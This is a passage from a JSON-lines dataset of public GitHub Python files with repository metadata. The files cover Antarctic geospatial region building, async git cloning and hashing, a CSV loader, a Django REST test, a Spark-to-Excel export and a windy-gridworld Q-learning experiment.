=contacts(\"\")","repo_name":"PolyCoro/CoroMail","sub_path":"src/contacts.py","file_name":"contacts.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18205063707","text":"#!/usr/bin/env python\n\nimport shapely.geometry\nimport shapely.ops\nimport numpy\nimport xarray\nimport os\nimport matplotlib.pyplot as plt\nimport pyproj\nimport zipfile\nimport shutil\n\nfrom geometric_features import GeometricFeatures, FeatureCollection\nfrom geometric_features.feature_collection import _round_coords\n\nfrom geometric_features.download import download_files\nfrom geometric_features.utils import write_feature_names_and_tags\n\n\ndef bedmap2_bin_to_netcdf(outFileName):\n\n if os.path.exists(outFileName):\n return\n\n fields = ['bed', 'surface', 'thickness', 'coverage', 'rockmask',\n 'grounded_bed_uncertainty', 'icemask_grounded_and_shelves']\n\n allExist = True\n for field in fields:\n fileName = 'bedmap2/bedmap2_bin/bedmap2_{}.flt'.format(field)\n if not os.path.exists(fileName):\n allExist = False\n break\n\n if not allExist:\n # download\n baseURL = 'https://secure.antarctica.ac.uk/data/bedmap2'\n fileNames = ['bedmap2_bin.zip']\n\n download_files(fileNames, baseURL, 'bedmap2')\n\n print('Decompressing Bedmap2 data...')\n # unzip\n with zipfile.ZipFile('bedmap2/bedmap2_bin.zip', 'r') as f:\n f.extractall('bedmap2/')\n print(' Done.')\n\n print('Converting Bedmap2 to NetCDF...')\n ds = xarray.Dataset()\n x = numpy.linspace(-3333000., 3333000., 6667)\n y = x\n ds['x'] = ('x', x)\n ds.x.attrs['units'] = 'meters'\n ds['y'] = ('y', y)\n ds.y.attrs['units'] = 'meters'\n ds.attrs['Grid'] = \"Datum = WGS84, earth_radius = 6378137., \" \\\n \"earth_eccentricity = 0.081819190842621, \" \\\n \"falseeasting = -3333000., \" \\\n \"falsenorthing = -3333000., \" \\\n \"standard_parallel = -71., central_meridien = 0, \" \\\n \"EPSG=3031\"\n ds.attrs['proj'] = \"+proj=stere +lat_0=-90 +lat_ts=-71 +lon_0=0 +k=1 \" \\\n \"+x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs\"\n ds.attrs['proj4'] = \"+init=epsg:3031\"\n\n # Antarctic stereographic\n inProj = pyproj.Proj(init='epsg:3031')\n # lon/lat\n outProj = pyproj.Proj(init='epsg:4326')\n X, Y = numpy.meshgrid(x, y)\n Lon, Lat = pyproj.transform(inProj, outProj, X, Y)\n\n ds['lon'] = (('y', 'x'), Lon)\n ds.lon.attrs['units'] = 'degrees east'\n ds['lat'] = (('y', 'x'), Lat)\n ds.lat.attrs['units'] = 'degrees north'\n\n # add Bedmap2 data\n for fieldName in fields:\n fileName = 'bedmap2/bedmap2_bin/bedmap2_{}.flt'.format(fieldName)\n with open(fileName, 'r') as f:\n field = numpy.fromfile(f, dtype=numpy.float32).reshape(6667, 6667)\n # flip the y axis\n field = field[::-1, :]\n # switch invalid values to be NaN (as expected by xarray)\n field[field == -9999.] = numpy.nan\n if fieldName == 'rockmask':\n # rock mask is zero where rock and -9999 (now NaN) elsewhere\n field = numpy.array(numpy.isfinite(field), numpy.float32)\n if fieldName == 'icemask_grounded_and_shelves':\n # split into separate grounded and floating masks\n ds['icemask_grounded'] = \\\n (('y', 'x'), numpy.array(field == 0, numpy.float32))\n ds['icemask_shelves'] = \\\n (('y', 'x'), numpy.array(field == 1, numpy.float32))\n ds['open_ocean_mask'] = \\\n (('y', 'x'), numpy.array(numpy.isnan(field), numpy.float32))\n else:\n ds[fieldName] = (('y', 'x'), field)\n\n ds.to_netcdf(outFileName)\n print(' Done.')\n\n\ndef get_longest_contour(contourValue, author):\n\n def stereo_to_lon_lat(x, y):\n return pyproj.transform(inProj, outProj, x, y)\n\n ds = xarray.open_dataset('bedmap2.nc')\n\n # plot contours\n plt.figure()\n cs = plt.contour(ds.x.values, ds.y.values, ds.bed, (contourValue,))\n paths = cs.collections[0].get_paths()\n\n pathLengths = [len(paths[i]) for i in range(len(paths))]\n iLongest = numpy.argmax(pathLengths)\n\n p = paths[iLongest]\n v = p.vertices\n x = v[:, 0]\n y = v[:, 1]\n\n # Antarctic stereographic\n inProj = pyproj.Proj(init='epsg:3031')\n # lon/lat\n outProj = pyproj.Proj(init='epsg:4326')\n\n poly = shapely.geometry.Polygon([(i[0], i[1]) for i in zip(x, y)])\n\n epsilon = 1e-14\n minY = numpy.amin(y)\n wedge = shapely.geometry.Polygon([(epsilon, minY),\n (epsilon**2, -epsilon),\n (0, epsilon),\n (-epsilon**2, -epsilon),\n (-epsilon, minY),\n (epsilon, minY)])\n\n difference = poly.difference(wedge)\n\n difference = shapely.ops.transform(stereo_to_lon_lat, difference)\n\n fc = FeatureCollection()\n\n geometry = shapely.geometry.mapping(difference)\n # get rid of the wedge again by rounding the coordinates\n geometry['coordinates'] = _round_coords(geometry['coordinates'])\n\n fc.add_feature(\n {\"type\": \"Feature\",\n \"properties\": {\"name\": \"Contour {}\".format(contourValue),\n \"author\": author,\n \"object\": 'region',\n \"component\": 'ocean'},\n \"geometry\": geometry})\n\n return fc\n\n\ndef make_polygon(lons, lats, name, author, tags):\n fc = FeatureCollection()\n\n coords = list()\n for index in range(len(lons)):\n coords.append([lons[index], lats[index]])\n coords.append([lons[0], lats[0]])\n\n fc.add_feature(\n {\"type\": \"Feature\",\n \"properties\": {\"name\": name,\n \"author\": author,\n \"object\": 'region',\n \"component\": 'ocean',\n \"tags\": tags,\n \"zmin\": -1500.,\n \"zmax\": -200.},\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [coords]}})\n return fc\n\n\ndef shelf_polygon(lons, lats, name, author, tags, fcContour):\n fc = make_polygon(lons, lats, name, author, tags)\n\n lons = [-180., -180., 180., 180.]\n lats = [-90., 90., 90., -90.]\n fc_world = make_polygon(lons, lats, name, author, tags)\n\n fcContour = fc_world.difference(fcContour)\n\n fcShelf = fc.difference(fcContour)\n\n props = fcShelf.features[0]['properties']\n props['name'] = props['name'] + ' Shelf'\n props['tags'] = props['tags'] + ';Shelf'\n props['zmin'] = -1500.\n props['zmax'] = -200.\n\n return fcShelf\n\n\ndef main():\n author = 'Xylar Asay-Davis, Alice Barthel, Nicolas Jourdain'\n tags = 'Antarctic;ISMIP6'\n\n # make a geometric features object that knows about the geometric data\n # cache up a couple of directories\n gf = GeometricFeatures('../../geometric_data')\n\n bedmap2_bin_to_netcdf('bedmap2.nc')\n\n fcContour1500 = get_longest_contour(contourValue=-1500., author=author)\n\n fc = FeatureCollection()\n\n lons = [-65., -25., -25., -65.]\n lats = [-80., -80., -77., -71.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Weddell Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [-128., -128., -90., -90.]\n lats = [-76., -69., -69., -76.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Amundsen Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [45., 45., 90., 90.]\n lats = [-70., -60., -60., -70.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Amery Sector', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [-22.5, -22.5, 22.5, 22.5]\n lats = [-75., -65., -65., -75.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Dronning Maud Land', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [110., 110., 130., 130.]\n lats = [-70., -60., -60., -70.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Totten Region', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [165., 165., 180., 180.]\n lats = [-80., -71., -73., -80.]\n fc_ross = shelf_polygon(\n lons, lats, name='ISMIP6 Western Ross Sea', author=author, tags=tags,\n fcContour=fcContour1500)\n\n lons = [-180., -180., -150., -150.]\n lats = [-80., -73., -77., -80.]\n fc_ross.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Eastern Ross Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n old_props = fc_ross.features[0]['properties']\n fc_ross = fc_ross.combine('ISMIP6 Ross Sea')\n props = fc_ross.features[0]['properties']\n for prop in ['tags', 'zmin', 'zmax']:\n props[prop] = old_props[prop]\n\n fc.merge(fc_ross)\n\n fc.plot(projection='southpole')\n fc.to_geojson('ismip6_antarctic_ocean_regions.geojson')\n\n # \"split\" these features into individual files in the geometric data cache\n gf.split(fc)\n\n # update the database of feature names and tags\n write_feature_names_and_tags(gf.cacheLocation)\n # move the resulting file into place\n shutil.copyfile('features_and_tags.json',\n '../../geometric_features/features_and_tags.json')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MPAS-Dev/geometric_features","sub_path":"feature_creation_scripts/ismip6_antarctic_ocean_regions/ismip6_antarctic_ocean_regions.py","file_name":"ismip6_antarctic_ocean_regions.py","file_ext":"py","file_size_in_byte":9224,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"4072538165","text":"import asyncio\nimport git\nimport hashlib\nimport os\n\n\nasync def clone_rep(repo_url, destination, loop):\n print(f'START LOADING {repo_url}')\n try:\n await loop.run_in_executor(\n None, git.Repo.clone_from, repo_url, destination)\n print(f'FINISH LOADING {repo_url}')\n return True\n except Exception as e:\n print(f'Failed to load {repo_url}. Reason: {e}')\n return False\n\n\ndef dir_hash(directory, verbose=0):\n sha_hash = hashlib.sha256()\n if not os.path.exists(directory):\n return -1\n\n try:\n for root, dirs, files in os.walk(directory):\n for names in sorted(files):\n filepath = os.path.join(root, names)\n if verbose == 1:\n print(f'Hashing {filepath}')\n try:\n f1 = open(filepath, 'rb')\n except Exception as e:\n # You can't open the file for some reason\n print(e)\n f1.close()\n continue\n\n while 1:\n # Read file in as little chunks\n buf = f1.read(4096)\n if not buf:\n break\n h = hashlib.sha256(buf)\n d = h.hexdigest().encode('utf-8')\n sha_hash.update(d)\n print(sha_hash.hexdigest())\n f1.close()\n\n except Exception as e:\n print(e)\n return -2\n res = sha_hash.hexdigest()\n print(res)\n return res\n\n\nasync def clone_all(root):\n repo_url = \"https://gitea.radium.group/radium/project-configuration\"\n loop = asyncio.get_event_loop()\n res = await asyncio.gather(\n clone_rep(repo_url, os.path.join(root, \"1\"), loop),\n clone_rep(repo_url, os.path.join(root, \"2\"), loop),\n clone_rep(repo_url, os.path.join(root, \"3\"), loop)\n )\n hashes = []\n if res[0]:\n hashes.append(dir_hash(os.path.join(root, \"1\"), 1))\n if res[1]:\n hashes.append(dir_hash(os.path.join(root, \"2\"), 1))\n if res[2]:\n hashes.append(dir_hash(os.path.join(root, \"3\"), 1))\n\n return hashes\n\nif __name__ == \"__main__\":\n asyncio.run(clone_all(\"data\"))\n","repo_name":"Naaadya/async_test","sub_path":"async_load.py","file_name":"async_load.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32201728289","text":"import csv\nimport numpy as np\n\ndef loadFile(filename):\n records = []\n with open(filename, 'r', newline='') as file:\n reader = csv.reader(file)\n for row in reader:\n records.append(np.array(row).astype(float))\n return np.array(records)","repo_name":"mtmmy/kmeans_and_GMM","sub_path":"loadCSV.py","file_name":"loadCSV.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14169926699","text":"\"\"\"\nTest utils.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nfrom django.urls import reverse\nfrom django.core.management import call_command\n\nimport pytest\n\nfrom rest_framework import status\n\nfrom .base import BaseRestFrameworkTestCase\n\n__title__ = 'django_elasticsearch_dsl_drf.tests.test_utils'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n 'TestUtils',\n)\n\n\n@pytest.mark.django_db\nclass TestUtils(BaseRestFrameworkTestCase):\n \"\"\"Test utils.\"\"\"\n\n pytestmark = pytest.mark.django_db\n\n @classmethod\n def setUpClass(cls):\n super(TestUtils, cls).setUpClass()\n\n cls.sleep()\n call_command('search_index', '--rebuild', '-f')\n\n def _list_results(self):\n \"\"\"List results.\"\"\"\n self.authenticate()\n\n url = reverse('bookdocument_no_records-list', kwargs={})\n\n # Make request\n response = self.client.get(url, {})\n self.assertEqual(\n response.status_code,\n status.HTTP_200_OK\n )\n\n # Should contain no results\n self.assertEqual(response.data['results'], [])\n self.assertEqual(response.data['count'], 0)\n self.assertEqual(response.data['next'], None)\n self.assertEqual(response.data['previous'], None)\n\n def test_list_results(self):\n \"\"\"Test list results.\"\"\"\n return self._list_results()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"1151375621","text":"from KgeN.tir.ir.visitor import CollectVisitor\n\n\nclass AccessEntry:\n READ=0\n WRITE=1\n def __init__(self, type, tensor, nest_loop):\n self.type = type\n self.tensor = tensor\n self.nest_loop = nest_loop\n\nclass SyncAnalysisVisitor(CollectVisitor):\n def __init__(self):\n super().__init__()\n self.access_list = []\n self.nest_loop = []\n self.m = {\n AccessEntry.READ: {},\n AccessEntry.WRITE: {}\n }\n \n def analysis(self, func):\n func.accept(self)\n return func\n \n def visit_func_stmt(self, stmt):\n for st in stmt.body:\n st.accept(self)\n\n for entry in self.access_list:\n if entry.tensor in self.m[1 - entry.type]:\n # write before\n loop, has_same_loop = find_sync_loop(entry.nest_loop, self.m[1 - entry.type][entry.tensor].nest_loop)\n if has_same_loop:\n loop.need_sync_before = True\n loop.need_sync_after = True\n else:\n loop.need_sync_before = True\n self.m[entry.type][entry.tensor] = entry\n \n def visit_for_stmt(self, stmt):\n self.nest_loop.append(stmt)\n for st in stmt.body:\n st.accept(self)\n self.nest_loop.pop()\n \n def visit_assign_stmt(self, stmt):\n tensor = stmt.dest.tensor\n for inp in tensor.op.inputs:\n if inp.scope == \"shared\":\n self.access_list.append(AccessEntry(AccessEntry.READ, inp, tuple(self.nest_loop)))\n if tensor.scope == \"shared\":\n self.access_list.append(AccessEntry(AccessEntry.WRITE, tensor, tuple(self.nest_loop)))\n\ndef find_sync_loop(loop_a, loop_b):\n has_same_loop = False\n for i, j in zip(loop_a, loop_b):\n if i is not j:\n return i, has_same_loop\n else:\n has_same_loop = True\n return None, has_same_loop\n\ndef sync_analysis_pass(func):\n visitor = SyncAnalysisVisitor()\n func = visitor.analysis(func)\n return func","repo_name":"Cjkkkk/KgeN","sub_path":"KgeN/tir/transform/sync_analysis.py","file_name":"sync_analysis.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"29126778435","text":"import findspark\r\nfindspark.init()\r\n\r\nfrom pyspark.sql import SparkSession\r\nfrom openpyxl.utils import get_column_letter\r\nfrom pandas import ExcelWriter\r\nimport os\r\n\r\n\r\n# https://stackoverflow.com/a/66599619\r\ndef auto_format_cell_width(ws):\r\n for letter in range(1, ws.max_column):\r\n maximum_value = 0\r\n for cell in ws[get_column_letter(letter)]:\r\n val_to_check = len(str(cell.value))\r\n if val_to_check > maximum_value:\r\n maximum_value = val_to_check\r\n ws.column_dimensions[get_column_letter(letter)].width = maximum_value + 2\r\n\r\n\r\nspark = SparkSession.builder.appName(\"Spark_Pandas_Excel\") \\\r\n .getOrCreate()\r\nspark.sparkContext.setLogLevel(\"ERROR\")\r\n\r\ninputfilelist = [\"C:\\\\Users\\\\Vicky\\\\Minnie\\\\homes.csv\", \"C:\\\\Users\\\\Vicky\\\\Minnie\\\\sample_data.csv\"]\r\noutputfile = \"C:\\\\Users\\\\Vicky\\\\Desktop\\\\output.xlsx\"\r\n\r\nfirst_time_file_flag = True\r\nfor inputfile in inputfilelist:\r\n sparkDF = spark.read.options(header='true', inferSchema='true').csv(inputfile)\r\n sheet_name = os.path.splitext(os.path.basename(inputfile))[0]\r\n if first_time_file_flag:\r\n excel = ExcelWriter(outputfile, engine='openpyxl', mode='w')\r\n first_time_file_flag = False\r\n else:\r\n excel = ExcelWriter(outputfile, engine='openpyxl', mode='a')\r\n sparkDF.toPandas().to_excel(excel, sheet_name=sheet_name, index=False, startrow=2)\r\n workbook = excel.book\r\n worksheet = workbook[sheet_name]\r\n worksheet.cell(column=1, row=1, value=sheet_name + \" file data:\")\r\n auto_format_cell_width(worksheet)\r\n excel.save()\r\n print(\"Done: \" + inputfile)\r\n\r\nspark.stop()\r\n","repo_name":"soumasish-das/python","sub_path":"spark_pandas_excel.py","file_name":"spark_pandas_excel.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8933354717","text":"# https://binarysearch.io/question/309\n\nclass Solution:\n def solve(self, G):\n time = 0\n visited = set()\n entry_time = {}\n min_time = {}\n res = 0\n\n def dfs(v, par=None):\n nonlocal time, res\n visited.add(v)\n entry_time[v] = time\n min_time[v] = time\n time += 1\n for to in G[v]:\n if to == par: continue\n if to in visited:\n min_time[v] = min(min_time[v], entry_time[to])\n else:\n dfs(to, v)\n min_time[v] = min(min_time[v], min_time[to])\n if min_time[to] > entry_time[v]:\n res += 1\n\n for i in range(len(G)):\n if i not in visited:\n dfs(i)\n\n return res\n\n\ns = Solution()\ngraph = [[1, 2, 3], [0, 5], [0, 3], [0, 2, 4], [3], [1]]\nassert s.solve(graph) == 3","repo_name":"sashaaero/binarysearch-problems","sub_path":"problems/harder/london_bridge.py","file_name":"london_bridge.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"9387338041","text":"from classes import ParseData\nimport csv\nimport sys\n\n\ndef Main():\n count = 0\n while (exit != True):\n\n UserAnswer = input(\n \"\\nWould you like to? : \\n(1): Display Current Data.\\n(2): Create New User \\n(3): Analyze Data \\n(4): Exit. \\n\")\n Data = ParseData.readData();\n\n if (UserAnswer == \"1\"):\n\n # READS IN DATA FROM CSV INTO NESTED ARRAY/LIST\n # print('');\n # print('READS IN DATA FROM CSV INTO NESTED ARRAY/LIST');\n Data = ParseData.readData();\n\n # DISPLAYS NESTED LIST\n # print('');\n # print('DISPLAYS NESTED LIST');\n ParseData.showData(Data);\n elif (UserAnswer == \"2\"):\n count = len(Data) + 1;\n #count = count + 1\n createData = ParseData.createData(Data, count);\n\n elif (UserAnswer == \"3\"):\n ParseData.analyzeData(Data);\n\n elif (UserAnswer == \"4\"):\n sys.exit();\n\n else:\n print(\"TRY AGAIN .. DUMMY \\n\");\n\n\nMain();\n","repo_name":"brianramaswami/Zag-Friend-Finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9893283997","text":"# %%\nimport gym\nimport itertools\nimport matplotlib\nimport matplotlib.style\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\nfrom collections import defaultdict\n\nmatplotlib.style.use(\"ggplot\")\n# %% Windy thing\nimport gym\nimport numpy as np\nimport sys\nfrom gym.envs.toy_text import discrete\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\n\n\nclass WindyGridworldEnv(discrete.DiscreteEnv):\n\n metadata = {\"render.modes\": [\"human\", \"ansi\"]}\n\n def _limit_coordinates(self, coord):\n coord[0] = min(coord[0], self.shape[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], self.shape[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\n def _calculate_transition_prob(self, current, delta, winds):\n new_position = (\n np.array(current)\n + np.array(delta)\n + np.array([-1, 0]) * winds[tuple(current)]\n )\n new_position = self._limit_coordinates(new_position).astype(int)\n new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n is_done = tuple(new_position) == (3, 7)\n return [(1.0, new_state, -1.0, is_done)]\n\n def __init__(self):\n self.shape = (7, 10)\n\n nS = np.prod(self.shape) # number of squares\n nA = 4 # Number of potential actions\n\n # Wind strength\n winds = np.zeros(self.shape)\n winds[:, [3, 4, 5, 8]] = 1\n winds[:, [6, 7]] = 2\n print(winds)\n\n # Calculate transition probabilities\n P = {}\n for s in range(nS):\n position = np.unravel_index(s, self.shape)\n P[s] = {a: [] for a in range(nA)}\n P[s][UP] = self._calculate_transition_prob(position, [-1, 0], winds)\n P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1], winds)\n P[s][DOWN] = self._calculate_transition_prob(position, [1, 0], winds)\n P[s][LEFT] = self._calculate_transition_prob(position, [0, -1], winds)\n\n # We always start in state (3, 0)\n isd = np.zeros(nS)\n isd[np.ravel_multi_index((3, 0), self.shape)] = 1.0\n\n super(WindyGridworldEnv, self).__init__(nS, nA, P, isd)\n\n def render(self, mode=\"human\", close=False):\n self._render(mode, close)\n\n def _render(self, mode=\"human\", close=False):\n if close:\n return\n\n outfile = StringIO() if mode == \"ansi\" else sys.stdout\n\n for s in range(self.nS):\n position = np.unravel_index(s, self.shape)\n # print(self.s)\n if self.s == s:\n output = \" x \"\n elif position == (3, 7):\n output = \" T \"\n else:\n output = \" o \"\n\n if position[1] == 0:\n output = output.lstrip()\n if position[1] == self.shape[1] - 1:\n output = output.rstrip()\n output += \"\\n\"\n\n outfile.write(output)\n outfile.write(\"\\n\")\n\n\n# %% Plotting thing\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nfrom collections import namedtuple\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nEpisodeStats = namedtuple(\"Stats\", [\"episode_lengths\", \"episode_rewards\"])\n\n\ndef plot_cost_to_go_mountain_car(env, estimator, num_tiles=20):\n x = np.linspace(\n env.observation_space.low[0], env.observation_space.high[0], num=num_tiles\n )\n y = np.linspace(\n env.observation_space.low[1], env.observation_space.high[1], num=num_tiles\n )\n X, Y = np.meshgrid(x, y)\n Z = np.apply_along_axis(\n lambda _: -np.max(estimator.predict(_)), 2, np.dstack([X, Y])\n )\n\n fig = plt.figure(figsize=(10, 5))\n ax = fig.add_subplot(111, projection=\"3d\")\n surf = ax.plot_surface(\n X, Y, Z, rstride=1, cstride=1, cmap=matplotlib.cm.coolwarm, vmin=-1.0, vmax=1.0\n )\n ax.set_xlabel(\"Position\")\n ax.set_ylabel(\"Velocity\")\n ax.set_zlabel(\"Value\")\n ax.set_title('Mountain \"Cost To Go\" Function')\n fig.colorbar(surf)\n plt.show()\n\n\ndef plot_value_function(V, title=\"Value Function\"):\n \"\"\"\n Plots the value function as a surface plot.\n \"\"\"\n min_x = min(k[0] for k in V.keys())\n max_x = max(k[0] for k in V.keys())\n min_y = min(k[1] for k in V.keys())\n max_y = max(k[1] for k in V.keys())\n\n x_range = np.arange(min_x, max_x + 1)\n y_range = np.arange(min_y, max_y + 1)\n X, Y = np.meshgrid(x_range, y_range)\n\n # Find value for all (x, y) coordinates\n Z_noace = np.apply_along_axis(\n lambda _: V[(_[0], _[1], False)], 2, np.dstack([X, Y])\n )\n Z_ace = np.apply_along_axis(lambda _: V[(_[0], _[1], True)], 2, np.dstack([X, Y]))\n\n def plot_surface(X, Y, Z, title):\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(111, projection=\"3d\")\n surf = ax.plot_surface(\n X,\n Y,\n Z,\n rstride=1,\n cstride=1,\n cmap=matplotlib.cm.coolwarm,\n vmin=-1.0,\n vmax=1.0,\n )\n ax.set_xlabel(\"Player Sum\")\n ax.set_ylabel(\"Dealer Showing\")\n ax.set_zlabel(\"Value\")\n ax.set_title(title)\n ax.view_init(ax.elev, -120)\n fig.colorbar(surf)\n plt.show()\n\n plot_surface(X, Y, Z_noace, \"{} (No Usable Ace)\".format(title))\n plot_surface(X, Y, Z_ace, \"{} (Usable Ace)\".format(title))\n\n\ndef plot_episode_stats(stats, smoothing_window=10, noshow=False):\n # Plot the episode length over time\n fig1 = plt.figure(figsize=(10, 5))\n plt.plot(stats.episode_lengths)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Length\")\n plt.title(\"Episode Length over Time\")\n if noshow:\n plt.close(fig1)\n else:\n plt.show(fig1)\n\n # Plot the episode reward over time\n fig2 = plt.figure(figsize=(10, 5))\n rewards_smoothed = (\n pd.Series(stats.episode_rewards)\n .rolling(smoothing_window, min_periods=smoothing_window)\n .mean()\n )\n plt.plot(rewards_smoothed)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Reward (Smoothed)\")\n plt.title(\n \"Episode Reward over Time (Smoothed over window size {})\".format(\n smoothing_window\n )\n )\n if noshow:\n plt.close(fig2)\n else:\n plt.show(fig2)\n\n # Plot time steps and episode number\n fig3 = plt.figure(figsize=(10, 5))\n plt.plot(np.cumsum(stats.episode_lengths), np.arange(len(stats.episode_lengths)))\n plt.xlabel(\"Time Steps\")\n plt.ylabel(\"Episode\")\n plt.title(\"Episode per time step\")\n if noshow:\n plt.close(fig3)\n else:\n plt.show(fig3)\n\n return fig1, fig2, fig3\n\n\n# %% Create environment\nenv = WindyGridworldEnv()\n# %%\ndef createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n \"\"\"\n Creates an epsilon-greedy policy based\n on a given Q-function and epsilon.\n\n Returns a function that takes the state\n as an input and returns the probabilities\n for each action in the form of a numpy array\n of length of the action space(set of possible actions).\n \"\"\"\n\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions, dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += 1.0 - epsilon\n return Action_probabilities\n\n return policyFunction\n\n\n# %%\ndef qLearning(env, num_episodes, discount_factor=1.0, alpha=0.6, epsilon=0.1):\n \"\"\"\n Q-Learning algorithm: Off-policy TD control.\n Finds the optimal greedy policy while improving\n following an epsilon-greedy policy\"\"\"\n\n # Action value function\n # A nested dictionary that maps\n # state -> (action -> action-value).\n Q = defaultdict(lambda: np.zeros(env.action_space.n))\n\n # Keeps track of useful statistics\n stats = EpisodeStats(\n episode_lengths=np.zeros(num_episodes), episode_rewards=np.zeros(num_episodes)\n )\n\n # Create an epsilon greedy policy function\n # appropriately for environment action space\n policy = createEpsilonGreedyPolicy(Q, epsilon, env.action_space.n)\n\n # For every episode\n for ith_episode in range(num_episodes):\n\n # Reset the environment and pick the first action\n state = env.reset()\n\n for t in itertools.count():\n\n # get probabilities of all actions from current state\n action_probabilities = policy(state)\n\n # choose action according to\n # the probability distribution\n action = np.random.choice(\n np.arange(len(action_probabilities)), p=action_probabilities\n )\n # print(f\"action: {action}\")\n\n # take action and get reward, transit to next state\n next_state, reward, done, _ = env.step(action)\n # env._render()\n # print(f\"Next: {next_state}; reward: {reward}; done: {done}\")\n\n # Update statistics\n stats.episode_rewards[ith_episode] += reward\n stats.episode_lengths[ith_episode] = t\n\n # TD Update\n best_next_action = np.argmax(Q[next_state])\n td_target = reward + discount_factor * Q[next_state][best_next_action]\n td_delta = td_target - Q[state][action]\n Q[state][action] += alpha * td_delta\n\n # done is True if episode terminated\n if done:\n break\n\n state = next_state\n\n return Q, stats\n\n\n# %%\nQ, stats = qLearning(env, 100000)\n# %%\nplot_episode_stats(stats)\n\n# %% Best path\n# while True:\nwinds = np.zeros((7, 10))\nwinds[:, [3, 4, 5, 8]] = 1\nwinds[:, [6, 7]] = 2\n\nsquare = (3, 0)\n\nwhile square != (3, 7):\n idx = int(f\"{square[0]}{square[1]}\")\n bestDir = [\"up\", \"right\", \"down\", \"left\"][np.argmax(Q[idx])]\n print(f\"From square {square} best dir is {bestDir}\")\n\n bestStep = [(-1, 0), (0, 1), (1, 0), (0, -1)][np.argmax(Q[idx])]\n square = (\n max(square[0] + bestStep[0] - int(winds[square[0], square[1]]), 0),\n max(square[1] + bestStep[1], 0),\n )\n\n\n# %%\n","repo_name":"ryanofarrell/public","sub_path":"projects/chess/code/rlConcepts.py","file_name":"rlConcepts.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14404564544","text":"from __future__ import division\n\nimport base64\nimport copy\nimport itertools\nimport os\nfrom collections import defaultdict\nfrom decimal import Decimal\n\nimport boto3\nimport pytest\nfrom boto3.dynamodb.types import Binary\nfrom botocore.exceptions import NoRegionError\nfrom mock import patch\nfrom moto import mock_dynamodb2\n\nfrom dynamodb_encryption_sdk.delegated_keys.jce import JceNameLocalDelegatedKey\nfrom dynamodb_encryption_sdk.encrypted.client import EncryptedClient\nfrom dynamodb_encryption_sdk.encrypted.item import decrypt_python_item, encrypt_python_item\nfrom dynamodb_encryption_sdk.encrypted.resource import EncryptedResource\nfrom dynamodb_encryption_sdk.encrypted.table import EncryptedTable\nfrom dynamodb_encryption_sdk.identifiers import CryptoAction\nfrom dynamodb_encryption_sdk.internal.identifiers import ReservedAttributes\nfrom dynamodb_encryption_sdk.material_providers import CryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.material_providers.most_recent import CachingMostRecentProvider\nfrom dynamodb_encryption_sdk.material_providers.static import StaticCryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.material_providers.store.meta import MetaStore\nfrom dynamodb_encryption_sdk.material_providers.wrapped import WrappedCryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.materials import CryptographicMaterials\nfrom dynamodb_encryption_sdk.materials.raw import 